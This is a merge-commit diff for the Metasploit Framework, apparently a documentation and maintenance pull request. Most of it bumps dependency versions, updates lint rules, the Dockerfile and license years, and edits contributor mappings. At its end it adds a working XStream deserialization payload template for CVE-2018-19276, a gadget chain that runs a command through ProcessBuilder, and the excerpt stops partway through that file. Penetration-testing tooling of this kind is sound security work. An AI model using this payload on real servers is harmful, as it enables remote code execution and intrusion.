Merge pull request #12831 from h00die/doc_cleanup

Documentation standardization. This is the first step in standardizing the module documentation.

.mailmap

@@ -1,39 +1,41 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dwelch-r7 <dwelch-r7@github>         <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
+cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
+dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
+space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>               <todb@metasploit.com>
+todb-r7 <todb-r7@github>               <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at

.rubocop.yml

@@ -112,21 +112,21 @@ Metrics/MethodLength:
                   often exceed 200 lines.
   Max: 300
 
-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:            
   Enabled: true
   Description: 'Whoever made this requirement never looked at crypto methods, IV'
   MinNameLength: 2
 
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/UnneededPercentQ:
+Style/RedundantPercentQ:
   Enabled: false
 
 Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/AlignHash:
+Layout/HashAlignment:
   Enabled: false
   Description: 'aligning info hashes to match these rules is almost impossible to get right'
 
@@ -142,7 +142,7 @@ Layout/EmptyLinesAroundMethodBody:
   Enabled: false
   Description: 'these are used to increase readability'
 
-Layout/AlignParameters:
+Layout/ParameterAlignment:
   Enabled: true
   EnforcedStyle: 'with_fixed_indentation'
   Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

.ruby-version

@@ -1 +1 @@
-2.6.2
+2.6.5

.travis.yml

@@ -11,8 +11,8 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.5.5'
-  - '2.6.2'
+  - '2.5.7'
+  - '2.6.5'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -40,7 +40,7 @@ before_install:
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
   # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
   - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml

CONTRIBUTING.md

@@ -4,7 +4,7 @@ Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!  Before you get started, review our
 [Code of Conduct].  There are mutliple ways to help beyond just writing code:
  - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
+ - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
  - [Report a security vulnerability in Metasploit itself] to Rapid7.
  - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
    integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
@@ -36,6 +36,7 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
+* **Don't** post questions in older closed PRs.
 
 Pull request [PR#9966] is a good example to follow.
 
@@ -69,6 +70,7 @@ When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
+* **Don't** attempt to report issues on a closed PR.
 
 If you need some more guidance, talk to the main body of open source contributors over on our
 [Metasploit Slack] or [#metasploit on Freenode IRC].

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:2.6.2-alpine3.9 AS builder
+FROM ruby:2.6.5-alpine3.10 AS builder
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -27,16 +27,16 @@ RUN apk add --no-cache \
       zlib-dev \
       ncurses-dev \
       git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
     # temp fix for https://github.com/bundler/bundler/issues/6680
     && rm -rf /usr/local/bundle/cache \
     # needed so non root users can read content of the bundle
     && chmod -R a+r /usr/local/bundle
 
 
-FROM ruby:2.6.2-alpine3.9
+FROM ruby:2.6.5-alpine3.10
 LABEL maintainer="Rapid7"
 
 ENV APP_HOME=/usr/src/metasploit-framework
@@ -51,8 +51,11 @@ RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresq
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
-COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
-COPY --chown=root:metasploit . $APP_HOME/
+COPY --from=builder /usr/local/bundle /usr/local/bundle
+RUN chown -R root:metasploit /usr/local/bundle
+COPY . $APP_HOME/
+RUN chown -R root:metasploit $APP_HOME/
+RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
 
 WORKDIR $APP_HOME

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.17.79)
+    metasploit-framework (4.17.104)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -12,7 +12,10 @@ PATH
       concurrent-ruby (= 1.0.5)
       dnsruby
       ed25519
+      eventmachine
       faker
+      faraday (<= 0.17.0)
+      faye-websocket
       filesize
       jsobfu
       json
@@ -20,7 +23,7 @@ PATH
       metasploit-concern
       metasploit-credential (< 3.0.0)
       metasploit-model
-      metasploit-payloads (= 1.3.70)
+      metasploit-payloads (= 1.3.83)
       metasploit_data_models (< 3.0.0)
       metasploit_payloads-mettle (= 0.5.16)
       mqtt
@@ -55,7 +58,7 @@ PATH
       rex-random_identifier
       rex-registry
       rex-rop_builder
-      rex-socket (= 0.1.17)
+      rex-socket
       rex-sslscan
       rex-struct2
       rex-text
@@ -101,36 +104,40 @@ GEM
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
-    addressable (2.6.0)
-      public_suffix (>= 2.0.2, < 4.0)
+    addressable (2.7.0)
+      public_suffix (>= 2.0.2, < 5.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.10.0)
+    arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
     backports (3.15.0)
     bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.1)
     bindata (2.4.4)
     bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
-    crass (1.0.4)
+    crass (1.0.6)
     diff-lcs (1.3)
     dnsruby (1.61.3)
       addressable (~> 2.5)
     docile (1.3.2)
     ed25519 (1.2.4)
     erubis (2.7.0)
+    eventmachine (1.2.7)
     factory_girl (4.9.0)
       activesupport (>= 3.0.0)
     factory_girl_rails (4.9.0)
       factory_girl (~> 4.9.0)
       railties (>= 3.0.0)
-    faker (2.2.0)
+    faker (2.2.1)
       i18n (>= 0.8)
-    faraday (0.15.4)
+    faraday (0.17.0)
       multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
     filesize (0.2.0)
     fivemat (1.3.7)
     hashery (2.1.2)
@@ -138,8 +145,8 @@ GEM
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
-    json (2.2.0)
-    loofah (2.2.3)
+    json (2.3.0)
+    loofah (2.4.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     metasm (1.0.4)
@@ -160,7 +167,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.70)
+    metasploit-payloads (1.3.83)
     metasploit_data_models (2.0.17)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -174,7 +181,7 @@ GEM
     metasploit_payloads-mettle (0.5.16)
     method_source (0.9.2)
     mini_portile2 (2.4.0)
-    minitest (5.11.3)
+    minitest (5.14.0)
     mqtt (0.5.0)
     msgpack (1.3.1)
     multipart-post (2.1.1)
@@ -182,9 +189,10 @@ GEM
     net-ssh (5.2.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.4)
+    nokogiri (1.10.7)
       mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.2)
     openvas-omp (0.0.4)
@@ -192,7 +200,7 @@ GEM
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.13.0)
-    pdf-reader (2.2.1)
+    pdf-reader (2.4.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -207,8 +215,8 @@ GEM
     pry (0.12.2)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.1.1)
-    rack (1.6.11)
+    public_suffix (4.0.3)
+    rack (1.6.12)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
@@ -217,16 +225,16 @@ GEM
       activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.2.0)
-      loofah (~> 2.2, >= 2.2.2)
+    rails-html-sanitizer (1.3.0)
+      loofah (~> 2.3)
     railties (4.2.11.1)
       actionpack (= 4.2.11.1)
       activesupport (= 4.2.11.1)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.3.3)
+    rake (13.0.1)
     rb-readline (0.5.5)
-    recog (2.3.2)
+    recog (2.3.6)
       nokogiri
     redcarpet (3.5.0)
     rex-arch (0.1.13)
@@ -242,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
       jsobfu
       metasm
       rex-arch
@@ -255,7 +263,7 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.82)
+    rex-powershell (0.1.84)
       rex-random_identifier
       rex-text
     rex-random_identifier (0.1.4)
@@ -265,40 +273,40 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.17)
+    rex-socket (0.1.21)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.23)
+    rex-text (0.2.24)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    rspec (3.8.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.2)
-      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.4)
+    rspec (3.9.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
+    rspec-expectations (3.9.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.1)
+      rspec-support (~> 3.9.0)
+    rspec-mocks (3.9.1)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.2)
+      rspec-support (~> 3.9.0)
+    rspec-rails (3.9.0)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-      rspec-support (~> 3.8.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+      rspec-support (~> 3.9.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.8.2)
+    rspec-support (3.9.2)
     ruby-macho (2.2.0)
     ruby-rc4 (0.1.5)
     ruby_smb (1.1.0)
@@ -306,31 +314,34 @@ GEM
       rubyntlm
       windows_error
     rubyntlm (0.6.2)
-    rubyzip (1.2.3)
+    rubyzip (2.0.0)
     sawyer (0.8.2)
       addressable (>= 2.3.5)
       faraday (> 0.8, < 2.0)
-    simplecov (0.17.0)
+    simplecov (0.17.1)
       docile (~> 1.1)
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.2)
     sqlite3 (1.3.13)
     sshkey (2.0.0)
-    thor (0.20.3)
+    thor (1.0.1)
     thread_safe (0.3.6)
     timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.1)
+    tzinfo (1.2.6)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2019.2)
+    tzinfo-data (1.2019.3)
       tzinfo (>= 1.0.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
     windows_error (0.1.2)
     xdr (2.0.0)
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)
 
 PLATFORMS
   ruby

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided

LICENSE_GEMS

@@ -5,47 +5,49 @@ actionview, 4.2.11.1, MIT
 activemodel, 4.2.11.1, MIT
 activerecord, 4.2.11.1, MIT
 activesupport, 4.2.11.1, MIT
-addressable, 2.6.0, "Apache 2.0"
+addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.10.0, MIT
+arel-helpers, 2.11.0, MIT
 backports, 3.15.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
-crass, 1.0.4, MIT
+crass, 1.0.6, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 erubis, 2.7.0, MIT
+eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_girl, 4.9.0, MIT
 factory_girl_rails, 4.9.0, MIT
-faker, 2.2.0, MIT
-faraday, 0.15.4, MIT
+faker, 2.2.1, MIT
+faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
 i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
-loofah, 2.2.3, MIT
+json, 2.3.0, ruby
+loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 2.0.14, "New BSD"
-metasploit-framework, 4.17.79, "New BSD"
+metasploit-framework, 4.17.104, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 2.0.17, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.11.3, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.1, "Apache 2.0"
 multipart-post, 2.1.1, MIT
@@ -53,72 +55,74 @@ nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.4, MIT
-octokit, 4.14.0, MIT
+nokogiri, 1.10.7, MIT
+octokit, 4.15.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.2.1, MIT
+pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 3.1.1, MIT
-rack, 1.6.11, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.12, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.2.0, MIT
+rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
-rake, 12.3.3, MIT
+rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.2, unknown
+recog, 2.3.6, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.82, "New BSD"
+rex-powershell, 0.1.84, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.17, "New BSD"
+rex-socket, 0.1.21, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.23, "New BSD"
+rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.8.0, MIT
-rspec-core, 3.8.2, MIT
-rspec-expectations, 3.8.4, MIT
-rspec-mocks, 3.8.1, MIT
-rspec-rails, 3.8.2, MIT
+rspec, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
+rspec-expectations, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
+rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.2, MIT
+rspec-support, 3.9.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.3, "Simplified BSD"
+rubyzip, 2.0.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.0, MIT
+simplecov, 0.17.1, MIT
 simplecov-html, 0.10.2, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2019.2, MIT
+ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.6, MIT
+tzinfo-data, 1.2019.3, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT

README.md

@@ -1,7 +1,7 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-COPYING for more details.
+[COPYING](COPYING) for more details.
 
 The latest version of this software is available from: https://metasploit.com
 

config/application.rb

@@ -1,3 +1,4 @@
+require File.expand_path('../rails_bigdecimal_fix', __FILE__)
 require 'rails'
 require File.expand_path('../boot', __FILE__)
 

config/boot.rb

@@ -9,6 +9,8 @@ GEMFILE_EXTENSIONS = [
 msfenv_real_pathname = Pathname.new(__FILE__).realpath
 root = msfenv_real_pathname.parent.parent
 
+require File.expand_path('../rails_bigdecimal_fix', __FILE__)
+
 unless ENV['BUNDLE_GEMFILE']
   require 'pathname'
 
@@ -22,18 +24,6 @@ unless ENV['BUNDLE_GEMFILE']
   end
 end
 
-# Remove bigdecimal warning - start
-# https://github.com/ruby/bigdecimal/pull/115
-# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
-# TODO: remove when upgrading from rails 4.x
-require 'bigdecimal'
-
-def BigDecimal.new(*args, **kwargs)
-  return BigDecimal(*args) if kwargs.empty?
-  BigDecimal(*args, **kwargs)
-end
-# Remove bigdecimal warning - end
-
 begin
   require 'bundler/setup'
 rescue LoadError => e

config/rails_bigdecimal_fix.rb

@@ -0,0 +1,11 @@
+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end

data/exploits/CVE-2018-19276/payload.erb

@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
